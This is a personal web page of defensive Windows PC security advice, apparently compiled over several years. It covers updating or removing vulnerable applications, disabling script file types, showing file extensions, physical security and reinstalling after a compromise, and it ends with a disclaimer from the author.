Java or latest needs to be kept up-to-date (and/or removed and/or disabled in the browser).

Reference(s):


There are vulnerabilities in AIM (AOL Instant Messenger).

Reference(s):


Do not use MSN Messenger as it has privacy problems (combine that with cross-site-scripting problems on MS sites...); servers are misconfigured; and it can be hijacked.

Reference(s):


Need to update YIM.

Reference(s):


Need to update ICQ.

Reference(s):


Need to update mIRC.

Reference(s):


Vulnerabilities have been found in Skype, and you should update the software.

Reference(s):


Vulnerabilities have been found in RealPlayer, and you should update the software.

Reference(s):


Vulnerabilities have been found in Winamp, and you should update the software.

Reference(s):


Windows Media Player seems to have security problems: it will run a WMA or WMF file as such, even when renamed; and even though it is not the default MP3 player. Use e.g. RealPlayer or Winamp instead, and un-install WMP. Note also that both WMP and RealPlayer may be "tricked" via files named WAV or MP3 that in fact contain something else.

Reference(s):


Should un-install Apple QuickTime Player: no longer supported or needed on Windows.

Reference(s):


Upgrade Flash and Shockwave players; or remove them altogether...

Reference(s):


1 Jul 13

Beware of long filenames

Long filename extensions: no patch or workaround yet (thankfully no remote exploit either). Explorer crashes, probably exploitable as a buffer overflow encoded into the extension.

Reference(s):

Long NTFS filenames: some software packages (Windows Explorer and CMD.EXE included) may not be able to access long NTFS pathnames.

Reference(s):


20 Jun 00

Disable WSH, VBS, CHM, Scrap

WSH is Windows Script Host. To disable, rename the relevant files; or for Windows 98, un-install it: select Start Menu > Settings > Control Panel > Add/Remove Programs > Windows Setup tab > Accessories and make sure Windows Scripting Host is deselected (no checkmark).

Reference(s):

Delete VBS VBScript (Visual Basic) Script File from the registered File Types list or use regedit to clobber the command to open them, or rename the software so it is not accessible. (VBS files may not be listed after you disabled WSH.) Delete VBE VBScript Encoded Script File also. Other file types (such as REG files) may also be dangerous, and can be removed/clobbered for a more secure system.

Reference(s):

Delete CHM Compiled HTML file from the registered File Types list or clobber the command with regedit, or rename the software so it is not accessible. Note that there are CHM files in C:\windows\help\ and then you may not be able to use them.

Reference(s):

To disable scrap files, alter or remove File Types SHS and SHB or clobber the command shscrap.dll with regedit, or rename the software so it is not accessible.

Reference(s):


14 Feb 01

Un-hide file types

Make Windows show all file types (extensions): EXE files, scrap files, VBS scripts, PIF and LNK file attachments ... (sent by email?).


11 Nov 05

Miscellaneous settings

You may want to be careful with what "legit" software you install. In particular, you may want to turn off autoplay on your CD drive (as mentioned above).

Reference(s):


Under Win2k/NT, a user can lock files so that no other user can access them. (This may include logon scripts and files to set security policies...) This is a Windows design "feature", with no fix planned. (Or, are "group policies" but not logon scripts et al, fixed in MS02-016??)

Reference(s):


Though not security issues, Microsoft should not be rude to its competitors, should not engage in software piracy nor infringe patents.

Reference(s):


9 Sep 16

Physical security

I seem to have neglected physical security. Generally, once an attacker has access to the keyboard/screen of your computer, he can do any "bad things" he likes: you may need to have your computer room locked with a key.

Reference(s):


10 Oct 04

Recover from compromise

If your PC has been compromised (e.g. infected with some virus), and you would like to return it to a safe state, then you really should re-install it from scratch: re-format the hard disk and re-install Windows and all software, from safe media (e.g. original CDs).

If it had been infected with a "known virus" then maybe your anti-virus product can clean it up. However, can you be sure that was the only compromise: that there were no other as-yet-undetected viruses, or maybe some specific (personally directed) malware lurking?

You need to secure your newly installed PC before first connecting it to the internet (e.g. to read these instructions on how to keep it secure, or to use WindowsUpdate): at the height of the Blaster and Sasser worms, unprotected PCs were infected within a minute of connection. Print out these instructions, then re-format and re-install everything, and configure things to keep safe.


Disclaimer

Only Windows PCs are considered here. I do not keep track of Mac or MacOSX or of UNIX or Linux issues. - I only care about two or three kinds of Windows PC: Only issues of relevance to my setups are listed, some generalities first, then in apparently random order. Advice here may not be applicable to some Windows versions or other configurations. In particular I blissfully ignore IIS and SQL.

There are many security issues not covered here, either because I never knew about them, or because I did not think they were relevant to my setups. Do not rely solely on my advice. Conversely, following any advice here may render your computer inoperable. Use at your own risk. - Please let me know if I missed something obvious, or if any of the advice above gave you trouble.


Paul Szabo psz@maths.usyd.edu.au 28 Sep 16